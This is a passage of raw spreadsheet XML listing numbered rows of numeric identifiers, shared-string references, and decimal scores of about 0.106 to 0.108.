        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="15338" ht="15.75" customHeight="1">
      <c r="A15338" s="1">
        <v>12722.0</v>
      </c>
      <c r="B15338" s="2">
        <v>3.0896703E7</v>
      </c>
      <c r="C15338" s="2" t="s">
        <v>14795</v>
      </c>
      <c r="D15338" s="2">
        <v>1.0</v>
      </c>
      <c r="E15338" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15338" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="15339" ht="15.75" customHeight="1">
      <c r="A15339" s="1">
        <v>13361.0</v>
      </c>
      <c r="B15339" s="2">
        <v>3.4784134E7</v>
      </c>
      <c r="C15339" s="2" t="s">
        <v>14796</v>
      </c>
      <c r="D15339" s="2">
        <v>1.0</v>
      </c>
      <c r="E15339" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15339" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="15340" ht="15.75" customHeight="1">
      <c r="A15340" s="1">
        <v>15936.0</v>
      </c>
      <c r="B15340" s="2">
        <v>4.471925E7</v>
      </c>
      <c r="C15340" s="2" t="s">
        <v>14797</v>
      </c>
      <c r="D15340" s="2">
        <v>1.0</v>
      </c>
      <c r="E15340" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15340" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="15341" ht="15.75" customHeight="1">
      <c r="A15341" s="1">
        <v>17161.0</v>
      </c>
      <c r="B15341" s="2">
        <v>4.8890225E7</v>
      </c>
      <c r="C15341" s="2" t="s">
        <v>14798</v>
      </c>
      <c r="D15341" s="2">
        <v>1.0</v>
      </c>
      <c r="E15341" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15341" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="15342" ht="15.75" customHeight="1">
      <c r="A15342" s="1">
        <v>18008.0</v>
      </c>
      <c r="B15342" s="2">
        <v>5.14488E7</v>
      </c>
      <c r="C15342" s="2" t="s">
        <v>14799</v>
      </c>
      <c r="D15342" s="2">
        <v>1.0</v>
      </c>
      <c r="E15342" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15342" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="15343" ht="15.75" customHeight="1">
      <c r="A15343" s="1">
        <v>20893.0</v>
      </c>
      <c r="B15343" s="2">
        <v>1.6223739E7</v>
      </c>
      <c r="C15343" s="2" t="s">
        <v>14800</v>
      </c>
      <c r="D15343" s="2">
        <v>1.0</v>
      </c>
      <c r="E15343" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15343" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="15344" ht="15.75" customHeight="1">
      <c r="A15344" s="1">
        <v>26950.0</v>
      </c>
      <c r="B15344" s="2">
        <v>1.9592176E7</v>
      </c>
      <c r="C15344" s="2" t="s">
        <v>14656</v>
      </c>
      <c r="D15344" s="2">
        <v>1.0</v>
      </c>
      <c r="E15344" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15344" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="15345" ht="15.75" customHeight="1">
      <c r="A15345" s="1">
        <v>27295.0</v>
      </c>
      <c r="B15345" s="2">
        <v>2.1306947E7</v>
      </c>
      <c r="C15345" s="2" t="s">
        <v>14801</v>
      </c>
      <c r="D15345" s="2">
        <v>1.0</v>
      </c>
      <c r="E15345" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15345" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="15346" ht="15.75" customHeight="1">
      <c r="A15346" s="1">
        <v>374.0</v>
      </c>
      <c r="B15346" s="2">
        <v>1.6329069E7</v>
      </c>
      <c r="C15346" s="2" t="s">
        <v>14802</v>
      </c>
      <c r="D15346" s="2">
        <v>1.0</v>
      </c>
      <c r="E15346" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15346" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="15347" ht="15.75" customHeight="1">
      <c r="A15347" s="1">
        <v>1173.0</v>
      </c>
      <c r="B15347" s="2">
        <v>2.4622203E7</v>
      </c>
      <c r="C15347" s="2" t="s">
        <v>14803</v>
      </c>
      <c r="D15347" s="2">
        <v>1.0</v>
      </c>
      <c r="E15347" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15347" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="15348" ht="15.75" customHeight="1">
      <c r="A15348" s="1">
        <v>5320.0</v>
      </c>
      <c r="B15348" s="2">
        <v>4.5284878E7</v>
      </c>
      <c r="C15348" s="2" t="s">
        <v>14804</v>
      </c>
      <c r="D15348" s="2">
        <v>1.0</v>
      </c>
      <c r="E15348" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15348" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="15349" ht="15.75" customHeight="1">
      <c r="A15349" s="1">
        <v>6257.0</v>
      </c>
      <c r="B15349" s="2">
        <v>4.8111668E7</v>
      </c>
      <c r="C15349" s="2" t="s">
        <v>14805</v>
      </c>
      <c r="D15349" s="2">
        <v>1.0</v>
      </c>
      <c r="E15349" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15349" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="15350" ht="15.75" customHeight="1">
      <c r="A15350" s="1">
        <v>8733.0</v>
      </c>
      <c r="B15350" s="2">
        <v>5.4524225E7</v>
      </c>
      <c r="C15350" s="2" t="s">
        <v>14806</v>
      </c>
      <c r="D15350" s="2">
        <v>1.0</v>
      </c>
      <c r="E15350" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15350" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="15351" ht="15.75" customHeight="1">
      <c r="A15351" s="1">
        <v>12984.0</v>
      </c>
      <c r="B15351" s="2">
        <v>3271018.0</v>
      </c>
      <c r="C15351" s="2" t="s">
        <v>14807</v>
      </c>
      <c r="D15351" s="2">
        <v>1.0</v>
      </c>
      <c r="E15351" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15351" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="15352" ht="15.75" customHeight="1">
      <c r="A15352" s="1">
        <v>14298.0</v>
      </c>
      <c r="B15352" s="2">
        <v>3.8572072E7</v>
      </c>
      <c r="C15352" s="2" t="s">
        <v>14808</v>
      </c>
      <c r="D15352" s="2">
        <v>1.0</v>
      </c>
      <c r="E15352" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15352" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="15353" ht="15.75" customHeight="1">
      <c r="A15353" s="1">
        <v>17558.0</v>
      </c>
      <c r="B15353" s="2">
        <v>5.0208837E7</v>
      </c>
      <c r="C15353" s="2" t="s">
        <v>14809</v>
      </c>
      <c r="D15353" s="2">
        <v>1.0</v>
      </c>
      <c r="E15353" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15353" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="15354" ht="15.75" customHeight="1">
      <c r="A15354" s="1">
        <v>25432.0</v>
      </c>
      <c r="B15354" s="2">
        <v>1.3835621E7</v>
      </c>
      <c r="C15354" s="2" t="s">
        <v>14810</v>
      </c>
      <c r="D15354" s="2">
        <v>1.0</v>
      </c>
      <c r="E15354" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15354" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="15355" ht="15.75" customHeight="1">
      <c r="A15355" s="1">
        <v>27857.0</v>
      </c>
      <c r="B15355" s="2">
        <v>2.3428361E7</v>
      </c>
      <c r="C15355" s="2" t="s">
        <v>14811</v>
      </c>
      <c r="D15355" s="2">
        <v>1.0</v>
      </c>
      <c r="E15355" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15355" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="15356" ht="15.75" customHeight="1">
      <c r="A15356" s="1">
        <v>29716.0</v>
      </c>
      <c r="B15356" s="2">
        <v>3.440453E7</v>
      </c>
      <c r="C15356" s="2" t="s">
        <v>14812</v>
      </c>
      <c r="D15356" s="2">
        <v>1.0</v>
      </c>
      <c r="E15356" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15356" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="15357" ht="15.75" customHeight="1">
      <c r="A15357" s="1">
        <v>30577.0</v>
      </c>
      <c r="B15357" s="2">
        <v>4112371.0</v>
      </c>
      <c r="C15357" s="2" t="s">
        <v>14813</v>
      </c>
      <c r="D15357" s="2">
        <v>1.0</v>
      </c>
      <c r="E15357" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15357" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="15358" ht="15.75" customHeight="1">
      <c r="A15358" s="1">
        <v>33921.0</v>
      </c>
      <c r="B15358" s="2">
        <v>9266280.0</v>
      </c>
      <c r="C15358" s="2" t="s">
        <v>14814</v>
      </c>
      <c r="D15358" s="2">
        <v>1.0</v>
      </c>
      <c r="E15358" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15358" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="15359" ht="15.75" customHeight="1">
      <c r="A15359" s="1">
        <v>34154.0</v>
      </c>
      <c r="B15359" s="2">
        <v>9866204.0</v>
      </c>
      <c r="C15359" s="2" t="s">
        <v>14815</v>
      </c>
      <c r="D15359" s="2">
        <v>1.0</v>
      </c>
      <c r="E15359" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15359" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="15360" ht="15.75" customHeight="1">
      <c r="A15360" s="1">
        <v>2940.0</v>
      </c>
      <c r="B15360" s="2">
        <v>3.5954956E7</v>
      </c>
      <c r="C15360" s="2" t="s">
        <v>14816</v>
      </c>
      <c r="D15360" s="2">
        <v>1.0</v>
      </c>
      <c r="E15360" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15360" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="15361" ht="15.75" customHeight="1">
      <c r="A15361" s="1">
        <v>3218.0</v>
      </c>
      <c r="B15361" s="2">
        <v>3.7308141E7</v>
      </c>
      <c r="C15361" s="2" t="s">
        <v>14817</v>
      </c>
      <c r="D15361" s="2">
        <v>1.0</v>
      </c>
      <c r="E15361" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15361" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="15362" ht="15.75" customHeight="1">
      <c r="A15362" s="1">
        <v>3735.0</v>
      </c>
      <c r="B15362" s="2">
        <v>3.9657071E7</v>
      </c>
      <c r="C15362" s="2" t="s">
        <v>14818</v>
      </c>
      <c r="D15362" s="2">
        <v>1.0</v>
      </c>
      <c r="E15362" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15362" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="15363" ht="15.75" customHeight="1">
      <c r="A15363" s="1">
        <v>4652.0</v>
      </c>
      <c r="B15363" s="2">
        <v>4.310156E7</v>
      </c>
      <c r="C15363" s="2" t="s">
        <v>14819</v>
      </c>
      <c r="D15363" s="2">
        <v>1.0</v>
      </c>
      <c r="E15363" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15363" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="15364" ht="15.75" customHeight="1">
      <c r="A15364" s="1">
        <v>13549.0</v>
      </c>
      <c r="B15364" s="2">
        <v>3.5659102E7</v>
      </c>
      <c r="C15364" s="2" t="s">
        <v>14820</v>
      </c>
      <c r="D15364" s="2">
        <v>1.0</v>
      </c>
      <c r="E15364" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15364" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="15365" ht="15.75" customHeight="1">
      <c r="A15365" s="1">
        <v>17098.0</v>
      </c>
      <c r="B15365" s="2">
        <v>4.8675107E7</v>
      </c>
      <c r="C15365" s="2" t="s">
        <v>14821</v>
      </c>
      <c r="D15365" s="2">
        <v>1.0</v>
      </c>
      <c r="E15365" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15365" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="15366" ht="15.75" customHeight="1">
      <c r="A15366" s="1">
        <v>20692.0</v>
      </c>
      <c r="B15366" s="2">
        <v>1.4521903E7</v>
      </c>
      <c r="C15366" s="2" t="s">
        <v>14822</v>
      </c>
      <c r="D15366" s="2">
        <v>1.0</v>
      </c>
      <c r="E15366" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15366" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="15367" ht="15.75" customHeight="1">
      <c r="A15367" s="1">
        <v>21516.0</v>
      </c>
      <c r="B15367" s="2">
        <v>2.3195393E7</v>
      </c>
      <c r="C15367" s="2" t="s">
        <v>14823</v>
      </c>
      <c r="D15367" s="2">
        <v>1.0</v>
      </c>
      <c r="E15367" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15367" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="15368" ht="15.75" customHeight="1">
      <c r="A15368" s="1">
        <v>23253.0</v>
      </c>
      <c r="B15368" s="2">
        <v>5.3106449E7</v>
      </c>
      <c r="C15368" s="2" t="s">
        <v>14824</v>
      </c>
      <c r="D15368" s="2">
        <v>1.0</v>
      </c>
      <c r="E15368" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15368" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="15369" ht="15.75" customHeight="1">
      <c r="A15369" s="1">
        <v>29461.0</v>
      </c>
      <c r="B15369" s="2">
        <v>3.2314085E7</v>
      </c>
      <c r="C15369" s="2" t="s">
        <v>14825</v>
      </c>
      <c r="D15369" s="2">
        <v>1.0</v>
      </c>
      <c r="E15369" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15369" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="15370" ht="15.75" customHeight="1">
      <c r="A15370" s="1">
        <v>30081.0</v>
      </c>
      <c r="B15370" s="2">
        <v>3.6286212E7</v>
      </c>
      <c r="C15370" s="2" t="s">
        <v>14826</v>
      </c>
      <c r="D15370" s="2">
        <v>1.0</v>
      </c>
      <c r="E15370" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15370" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="15371" ht="15.75" customHeight="1">
      <c r="A15371" s="1">
        <v>31185.0</v>
      </c>
      <c r="B15371" s="2">
        <v>4913606.0</v>
      </c>
      <c r="C15371" s="2" t="s">
        <v>14827</v>
      </c>
      <c r="D15371" s="2">
        <v>1.0</v>
      </c>
      <c r="E15371" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15371" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="15372" ht="15.75" customHeight="1">
      <c r="A15372" s="1">
        <v>31279.0</v>
      </c>
      <c r="B15372" s="2">
        <v>4959220.0</v>
      </c>
      <c r="C15372" s="2" t="s">
        <v>14472</v>
      </c>
      <c r="D15372" s="2">
        <v>1.0</v>
      </c>
      <c r="E15372" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15372" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="15373" ht="15.75" customHeight="1">
      <c r="A15373" s="1">
        <v>2924.0</v>
      </c>
      <c r="B15373" s="2">
        <v>3.5868393E7</v>
      </c>
      <c r="C15373" s="2" t="s">
        <v>14828</v>
      </c>
      <c r="D15373" s="2">
        <v>1.0</v>
      </c>
      <c r="E15373" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15373" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="15374" ht="15.75" customHeight="1">
      <c r="A15374" s="1">
        <v>6664.0</v>
      </c>
      <c r="B15374" s="2">
        <v>4.9111227E7</v>
      </c>
      <c r="C15374" s="2" t="s">
        <v>14829</v>
      </c>
      <c r="D15374" s="2">
        <v>1.0</v>
      </c>
      <c r="E15374" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15374" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="15375" ht="15.75" customHeight="1">
      <c r="A15375" s="1">
        <v>7702.0</v>
      </c>
      <c r="B15375" s="2">
        <v>5.1973957E7</v>
      </c>
      <c r="C15375" s="2" t="s">
        <v>14830</v>
      </c>
      <c r="D15375" s="2">
        <v>1.0</v>
      </c>
      <c r="E15375" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15375" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="15376" ht="15.75" customHeight="1">
      <c r="A15376" s="1">
        <v>10560.0</v>
      </c>
      <c r="B15376" s="2">
        <v>1.26977E7</v>
      </c>
      <c r="C15376" s="2" t="s">
        <v>14831</v>
      </c>
      <c r="D15376" s="2">
        <v>1.0</v>
      </c>
      <c r="E15376" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15376" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="15377" ht="15.75" customHeight="1">
      <c r="A15377" s="1">
        <v>11474.0</v>
      </c>
      <c r="B15377" s="2">
        <v>2.1959077E7</v>
      </c>
      <c r="C15377" s="2" t="s">
        <v>14832</v>
      </c>
      <c r="D15377" s="2">
        <v>1.0</v>
      </c>
      <c r="E15377" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15377" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="15378" ht="15.75" customHeight="1">
      <c r="A15378" s="1">
        <v>16873.0</v>
      </c>
      <c r="B15378" s="2">
        <v>4.7962617E7</v>
      </c>
      <c r="C15378" s="2" t="s">
        <v>14833</v>
      </c>
      <c r="D15378" s="2">
        <v>1.0</v>
      </c>
      <c r="E15378" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15378" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="15379" ht="15.75" customHeight="1">
      <c r="A15379" s="1">
        <v>17147.0</v>
      </c>
      <c r="B15379" s="2">
        <v>4.8848738E7</v>
      </c>
      <c r="C15379" s="2" t="s">
        <v>14834</v>
      </c>
      <c r="D15379" s="2">
        <v>1.0</v>
      </c>
      <c r="E15379" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15379" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="15380" ht="15.75" customHeight="1">
      <c r="A15380" s="1">
        <v>18012.0</v>
      </c>
      <c r="B15380" s="2">
        <v>5.1477148E7</v>
      </c>
      <c r="C15380" s="2" t="s">
        <v>14835</v>
      </c>
      <c r="D15380" s="2">
        <v>1.0</v>
      </c>
      <c r="E15380" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15380" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="15381" ht="15.75" customHeight="1">
      <c r="A15381" s="1">
        <v>19938.0</v>
      </c>
      <c r="B15381" s="2">
        <v>5.7446062E7</v>
      </c>
      <c r="C15381" s="2" t="s">
        <v>14836</v>
      </c>
      <c r="D15381" s="2">
        <v>1.0</v>
      </c>
      <c r="E15381" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15381" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="15382" ht="15.75" customHeight="1">
      <c r="A15382" s="1">
        <v>23607.0</v>
      </c>
      <c r="B15382" s="2">
        <v>6405535.0</v>
      </c>
      <c r="C15382" s="2" t="s">
        <v>14269</v>
      </c>
      <c r="D15382" s="2">
        <v>1.0</v>
      </c>
      <c r="E15382" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15382" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="15383" ht="15.75" customHeight="1">
      <c r="A15383" s="1">
        <v>17163.0</v>
      </c>
      <c r="B15383" s="2">
        <v>4.8890225E7</v>
      </c>
      <c r="C15383" s="2" t="s">
        <v>14837</v>
      </c>
      <c r="D15383" s="2">
        <v>1.0</v>
      </c>
      <c r="E15383" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15383" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="15384" ht="15.75" customHeight="1">
      <c r="A15384" s="1">
        <v>28499.0</v>
      </c>
      <c r="B15384" s="2">
        <v>2.6703041E7</v>
      </c>
      <c r="C15384" s="2" t="s">
        <v>14838</v>
      </c>
      <c r="D15384" s="2">
        <v>1.0</v>
      </c>
      <c r="E15384" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15384" s="2">
        <v>0.1067708333333333</v>
      </c>
    </row>
    <row r="15385" ht="15.75" customHeight="1">
      <c r="A15385" s="1">
        <v>2833.0</v>
      </c>
      <c r="B15385" s="2">
        <v>3.5419314E7</v>
      </c>
      <c r="C15385" s="2" t="s">
        <v>14839</v>
      </c>
      <c r="D15385" s="2">
        <v>1.0</v>
      </c>
      <c r="E15385" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15385" s="2">
        <v>0.1066308243727598</v>
      </c>
    </row>
    <row r="15386" ht="15.75" customHeight="1">
      <c r="A15386" s="1">
        <v>28276.0</v>
      </c>
      <c r="B15386" s="2">
        <v>2.5462869E7</v>
      </c>
      <c r="C15386" s="2" t="s">
        <v>14840</v>
      </c>
      <c r="D15386" s="2">
        <v>1.0</v>
      </c>
      <c r="E15386" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15386" s="2">
        <v>0.1066308243727598</v>
      </c>
    </row>
    <row r="15387" ht="15.75" customHeight="1">
      <c r="A15387" s="1">
        <v>11371.0</v>
      </c>
      <c r="B15387" s="2">
        <v>2.1406476E7</v>
      </c>
      <c r="C15387" s="2" t="s">
        <v>14841</v>
      </c>
      <c r="D15387" s="2">
        <v>1.0</v>
      </c>
      <c r="E15387" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15387" s="2">
        <v>0.1065573770491803</v>
      </c>
    </row>
    <row r="15388" ht="15.75" customHeight="1">
      <c r="A15388" s="1">
        <v>25587.0</v>
      </c>
      <c r="B15388" s="2">
        <v>1.4341177E7</v>
      </c>
      <c r="C15388" s="2" t="s">
        <v>14842</v>
      </c>
      <c r="D15388" s="2">
        <v>1.0</v>
      </c>
      <c r="E15388" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15388" s="2">
        <v>0.1065573770491803</v>
      </c>
    </row>
    <row r="15389" ht="15.75" customHeight="1">
      <c r="A15389" s="1">
        <v>15520.0</v>
      </c>
      <c r="B15389" s="2">
        <v>4.3285388E7</v>
      </c>
      <c r="C15389" s="2" t="s">
        <v>14843</v>
      </c>
      <c r="D15389" s="2">
        <v>1.0</v>
      </c>
      <c r="E15389" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15389" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="15390" ht="15.75" customHeight="1">
      <c r="A15390" s="1">
        <v>31055.0</v>
      </c>
      <c r="B15390" s="2">
        <v>4.7982977E7</v>
      </c>
      <c r="C15390" s="2" t="s">
        <v>14844</v>
      </c>
      <c r="D15390" s="2">
        <v>1.0</v>
      </c>
      <c r="E15390" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15390" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="15391" ht="15.75" customHeight="1">
      <c r="A15391" s="1">
        <v>1954.0</v>
      </c>
      <c r="B15391" s="2">
        <v>3.028239E7</v>
      </c>
      <c r="C15391" s="2" t="s">
        <v>14845</v>
      </c>
      <c r="D15391" s="2">
        <v>1.0</v>
      </c>
      <c r="E15391" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15391" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="15392" ht="15.75" customHeight="1">
      <c r="A15392" s="1">
        <v>3302.0</v>
      </c>
      <c r="B15392" s="2">
        <v>3.7584769E7</v>
      </c>
      <c r="C15392" s="2" t="s">
        <v>14846</v>
      </c>
      <c r="D15392" s="2">
        <v>1.0</v>
      </c>
      <c r="E15392" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15392" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="15393" ht="15.75" customHeight="1">
      <c r="A15393" s="1">
        <v>15407.0</v>
      </c>
      <c r="B15393" s="2">
        <v>4.283613E7</v>
      </c>
      <c r="C15393" s="2" t="s">
        <v>14847</v>
      </c>
      <c r="D15393" s="2">
        <v>1.0</v>
      </c>
      <c r="E15393" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15393" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="15394" ht="15.75" customHeight="1">
      <c r="A15394" s="1">
        <v>17410.0</v>
      </c>
      <c r="B15394" s="2">
        <v>4.9658726E7</v>
      </c>
      <c r="C15394" s="2" t="s">
        <v>14848</v>
      </c>
      <c r="D15394" s="2">
        <v>1.0</v>
      </c>
      <c r="E15394" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15394" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="15395" ht="15.75" customHeight="1">
      <c r="A15395" s="1">
        <v>395.0</v>
      </c>
      <c r="B15395" s="2">
        <v>1.657018E7</v>
      </c>
      <c r="C15395" s="2" t="s">
        <v>14849</v>
      </c>
      <c r="D15395" s="2">
        <v>1.0</v>
      </c>
      <c r="E15395" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15395" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="15396" ht="15.75" customHeight="1">
      <c r="A15396" s="1">
        <v>2474.0</v>
      </c>
      <c r="B15396" s="2">
        <v>3.3843613E7</v>
      </c>
      <c r="C15396" s="2" t="s">
        <v>14850</v>
      </c>
      <c r="D15396" s="2">
        <v>1.0</v>
      </c>
      <c r="E15396" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15396" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="15397" ht="15.75" customHeight="1">
      <c r="A15397" s="1">
        <v>3273.0</v>
      </c>
      <c r="B15397" s="2">
        <v>3.7479791E7</v>
      </c>
      <c r="C15397" s="2" t="s">
        <v>14851</v>
      </c>
      <c r="D15397" s="2">
        <v>1.0</v>
      </c>
      <c r="E15397" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15397" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="15398" ht="15.75" customHeight="1">
      <c r="A15398" s="1">
        <v>3343.0</v>
      </c>
      <c r="B15398" s="2">
        <v>3.773742E7</v>
      </c>
      <c r="C15398" s="2" t="s">
        <v>14852</v>
      </c>
      <c r="D15398" s="2">
        <v>1.0</v>
      </c>
      <c r="E15398" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15398" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="15399" ht="15.75" customHeight="1">
      <c r="A15399" s="1">
        <v>11460.0</v>
      </c>
      <c r="B15399" s="2">
        <v>2.1908229E7</v>
      </c>
      <c r="C15399" s="2" t="s">
        <v>14853</v>
      </c>
      <c r="D15399" s="2">
        <v>1.0</v>
      </c>
      <c r="E15399" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15399" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="15400" ht="15.75" customHeight="1">
      <c r="A15400" s="1">
        <v>15430.0</v>
      </c>
      <c r="B15400" s="2">
        <v>4.2944525E7</v>
      </c>
      <c r="C15400" s="2" t="s">
        <v>14854</v>
      </c>
      <c r="D15400" s="2">
        <v>1.0</v>
      </c>
      <c r="E15400" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15400" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="15401" ht="15.75" customHeight="1">
      <c r="A15401" s="1">
        <v>16959.0</v>
      </c>
      <c r="B15401" s="2">
        <v>4.8253895E7</v>
      </c>
      <c r="C15401" s="2" t="s">
        <v>14855</v>
      </c>
      <c r="D15401" s="2">
        <v>1.0</v>
      </c>
      <c r="E15401" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15401" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="15402" ht="15.75" customHeight="1">
      <c r="A15402" s="1">
        <v>19866.0</v>
      </c>
      <c r="B15402" s="2">
        <v>5.7197654E7</v>
      </c>
      <c r="C15402" s="2" t="s">
        <v>14856</v>
      </c>
      <c r="D15402" s="2">
        <v>1.0</v>
      </c>
      <c r="E15402" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15402" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="15403" ht="15.75" customHeight="1">
      <c r="A15403" s="1">
        <v>24538.0</v>
      </c>
      <c r="B15403" s="2">
        <v>1.1214421E7</v>
      </c>
      <c r="C15403" s="2" t="s">
        <v>14857</v>
      </c>
      <c r="D15403" s="2">
        <v>1.0</v>
      </c>
      <c r="E15403" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15403" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="15404" ht="15.75" customHeight="1">
      <c r="A15404" s="1">
        <v>24588.0</v>
      </c>
      <c r="B15404" s="2">
        <v>1.1345769E7</v>
      </c>
      <c r="C15404" s="2" t="s">
        <v>14858</v>
      </c>
      <c r="D15404" s="2">
        <v>1.0</v>
      </c>
      <c r="E15404" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15404" s="2">
        <v>0.1063218390804598</v>
